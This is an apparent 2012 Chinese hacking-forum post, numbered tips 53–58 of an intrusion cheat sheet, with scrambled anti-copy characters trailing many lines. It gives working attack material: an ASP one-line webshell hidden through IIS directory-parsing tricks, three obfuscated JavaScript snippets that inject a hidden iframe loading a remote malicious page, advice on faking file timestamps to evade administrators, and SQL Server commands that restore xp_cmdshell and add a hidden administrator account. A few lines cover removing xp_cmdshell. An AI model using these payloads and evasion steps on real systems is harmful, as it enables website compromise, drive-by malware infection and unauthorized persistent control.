3 N, g6 A3 `. F/ Q) ?/ s. ^执行后可以用AT命令查看新加的任务% s; [# K& D- Z9 q
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) E! O7 v& G# B- ^0 P4 l$ m
$ \! h8 _; \5 Q8 s5 A53、隐藏ASP后门的两种方法
0 D8 R( d2 o- T; A% P" L1、建立非标准目录:mkdir images..\7 G5 t- r y& _. x
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp# h+ x* }% _: z5 C% I Z. n
通过web访问ASP木马:http://ip/images../news.asp?action=login8 U6 w, w I# C3 F5 ^: \. D; L) G
如何删除非标准目录:rmdir images..\ /s
3 W; X5 o+ }+ J7 G9 s- P o4 P2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
[( T2 ]3 a/ R7 M2 X7 w' qmkdir programme.asp
; c6 a# B# m0 W/ z7 D/ [* r新建1.txt文件内容:<!--#include file=”12.jpg”-->
& L, \" Q$ M% f |+ Y1 U新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件' g9 ]! }4 e5 `8 o$ O+ R" k
attrib +H +S programme.asp
! H% e4 {) {& R- ^5 [ G通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt8 a5 j$ {5 ^& ^; l8 C# ^! o, s( G& h9 P
0 Z. a1 h% s. n4 B
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。 c- u" g! Z$ o0 N. K
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。4 o7 `. e5 D4 u6 v3 `
+ L+ d) N& m- i55、JS隐蔽挂马& v y( T- ]# c! g3 l" i
1.$ T/ [+ _3 A% a4 X+ M; z
var tr4c3="<iframe src=ht";* I5 m5 Z1 d% ^0 \
tr4c3 = tr4c3+"tp:/";
" r/ P* ` b+ Xtr4c3 = tr4c3+"/ww";" Z- N0 _, U- J0 a, l
tr4c3 = tr4c3+"w.tr4";5 t# B5 f) f8 [1 b( W3 F$ _
tr4c3 = tr4c3+"c3.com/inc/m";! `7 O% p+ c5 l2 D; t; @
tr4c3 = tr4c3+"m.htm style="display:none"></i";
; W2 |0 J& }9 |0 Ktr4c3 =tr4c3+"frame>'";
/ `- j* X& Q9 l/ vdocument.write(tr4c3);
4 I# B" m7 t( x避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。7 w* y7 X# Y; a8 m! }
* r- C# `/ R; M2.
' p& {/ n2 v4 ^# |! g" X- a" U转换进制,然后用EVAL执行。如
, ^' Y$ j# L I0 E2 f' ueval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");) ]8 \0 p' ?+ j7 F
不过这个有点显眼。
4 I3 k5 `8 R5 V% N4 J3./ d& P n5 r7 i! B4 \8 I
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');2 {/ k" ]7 H9 g" P6 K
最后一点,别忘了把文件的时间也修改下。9 N5 i2 B. {: H* _. k* x
6 }3 Z7 g) m" r4 B
56.3389终端入侵常用DOS命令
0 J7 W2 O; u$ X R# y8 @taskkill taskkill /PID 1248 /t( N) ~2 L# ]4 |$ }& r; Z
, a7 n, b# ]7 d' G" X- u& D) V+ \
tasklist 查进程
; d5 ]! o& |0 T+ ~" [$ J
/ i$ f7 H& w6 k b' ]) bcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
/ J0 G t6 F# R$ r- j0 siisreset /reboot
! J0 ~. ]0 f1 }) [8 [2 K/ |tsshutdn /reboot /delay:1 重起服务器$ _: W. v7 }/ p: t* a' H% l: n
" \3 \" s9 C O1 w6 X! @, clogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,2 a/ D, i* @) `
1 z2 q' T; G4 H% l
query user 查看当前终端用户在线情况
5 ]- H) n7 \/ D" V- u$ d' d o' u0 ~
要显示有关所有会话使用的进程的信息,请键入:query process *
3 @/ x# W2 A1 y9 j1 T c
: l, M% J# I$ I+ c2 D( \7 t要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:29 L+ s. N2 s6 F- Z
( o1 [; n% |; k+ g1 ^) f+ h
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
5 K) a2 l; ~7 @2 J4 [( v, d' g1 {8 _: ~; L& m$ J
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
. D0 _) Z' e/ l1 a- a1 G9 D2 }0 i* h. Z9 w9 B9 I
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启/ R: N4 y i& ? a2 S# J
& E3 U4 @# h4 a7 A2 ^) D' o8 N" ^/ P% [
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统. v1 V# X& }6 y& b; N9 H; p- l
- {* b' o1 \ K2 h
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。1 U5 U2 J- B$ `; W f
6 y$ y3 R2 I, q/ [
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
/ r0 w' M: p# @1 v* H3 `2 |+ v4 U- |& y
56、在地址栏或按Ctrl+O,输入:) V' S/ \( X) y& V7 f3 k
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
+ T8 v7 I2 e L+ ]* u' N) a
$ B# h+ T* Q( y源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。" n9 P. n9 q3 t9 _1 K5 q$ s
9 k' J0 v& T* o/ _3 F57、net user的时候,是不能显示加$的用户,但是如果不处理的话,7 C$ t( O8 @, u, B2 F, R) |, x9 R- M
用net localgroup administrators是可以看到管理组下,加了$的用户的。+ Y3 P& O: v( V9 |
" c% S) e6 Y, B$ ~% P, M+ U9 H; ~
58、 sa弱口令相关命令6 J% P0 A0 j) w2 R% l1 l
/ I3 k1 Z7 j+ h# [$ [一.更改sa口令方法:+ H3 b# ]9 |/ s. K' I% t) |
用sql综合利用工具连接后,执行命令:% k) z; ^- Z$ P! P
exec sp_password NULL,'20001001','sa'5 |# G Z; F6 C0 s0 {- d. k T! ]7 a
(提示:慎用!)
9 w) W* v, f0 P0 f4 Z
$ u* X2 b3 t. j二.简单修补sa弱口令.
5 i5 a; ~9 T7 s. N7 U9 O( x9 O; z
- @$ O$ o/ D. v2 i方法1:查询分离器连接后执行:
5 I1 v1 r: V( }. r ~9 iif exists (select * from* e3 p$ T; Y6 d \4 l( b' a
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- N0 O1 G: ?$ f+ f3 _
OBJECTPROPERTY(id, N'IsExtendedProc') = 1), M2 J8 _ P. h- Q2 N. P
! N1 t/ K `9 r M& u: [( s4 H0 Bexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'* ~# a. |9 S" |% A! N8 T, R* S. J
$ `" r, |- N1 G0 g: a& X+ ]% @) KGO
' S* s, \, N9 i; M; P' @/ g6 I. S7 r' m" y
然后按F5键命令执行完毕
+ V9 m m* a# d( I6 d* g7 T# k
. N$ K& b' s+ H2 u方法2:查询分离器连接后
: J1 d( w9 k0 _" |+ e& ^* z8 w) H9 v第一步执行:use master
! o; ^& C% R. ^/ {6 C第二步执行:sp_dropextendedproc 'xp_cmdshell'
7 t( |1 x" P/ S& z4 Q然后按F5键命令执行完毕
7 Z: M; H7 ^" b# W) B' S3 R1 T6 ?* \; f
( ?- W. d1 z7 o, X6 m- e; c; s) j o1 l三.常见情况恢复执行xp_cmdshell.
0 N3 N K% n* g( ^( B
7 S9 v; U( f( p5 S! ^1 R0 J+ x) j) p% F) W: a
1 未能找到存储过程'master..xpcmdshell'.1 k1 T. y, K4 S& L5 @3 V, `3 \# q
恢复方法:查询分离器连接后,
0 b+ L) |2 n# Q9 Q第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int* G3 \/ i8 ^) Z- ~: Y N: |( |
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
9 v# k" `: ?( |7 ]) A9 M然后按F5键命令执行完毕
" e2 I9 c+ ~ C: N8 @% @; l8 |9 S
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
; D; m7 {. `+ }9 u8 }' _恢复方法:查询分离器连接后,
. N/ g2 U: W D; { y2 u9 t! v第一步执行:sp_dropextendedproc "xp_cmdshell"
0 `; |1 e; D. s% l第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! o+ ]4 i$ U6 e$ U5 v) u% R- y+ Z
然后按F5键命令执行完毕# h6 k8 _' ]) [2 X1 e& Y2 K
* E6 K. k- W# `8 m/ I! G6 q
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
' i! r+ e3 g, Y/ U o恢复方法:查询分离器连接后,
& h/ g. m2 C- L" ~第一步执行:exec sp_dropextendedproc 'xp_cmdshell'9 X& ~+ y, ]" e4 v: ]9 |2 X3 F6 d* _# t
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
! ?% N3 V; D( c) K5 Z. i然后按F5键命令执行完毕/ c) Y- [& b# \" @% b
6 n3 M8 a( r/ M& k) m7 `# d四.终极方法.
1 |3 [8 [$ a( E x/ ?8 l如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:4 F. ^% v! o; [, o5 w
查询分离器连接后,
Y4 H. P9 v" s2000servser系统:
7 B3 x& I# j) ]+ K7 g) _) ?( M1 Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
4 E" P. R" ]" p( D; |, z
' y& \. S0 g4 T5 I9 r$ sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 N0 }0 h$ m, d% O0 B! T
: P7 ?7 E I- S9 c. Q! u9 _# P$ ]xp或2003server系统:
2 Z3 b% Q* r, l6 P) T+ b
( _7 X$ B- [) y+ Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'2 ^9 c5 k, ?2 j1 o( I. G
" D5 k4 b2 H* W$ x( y5 `* `) Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 D- A/ Q5 p+ }3 ^, D0 q$ e7 i |
发表于 2012-9-15 14:51:03
收藏
支持
反对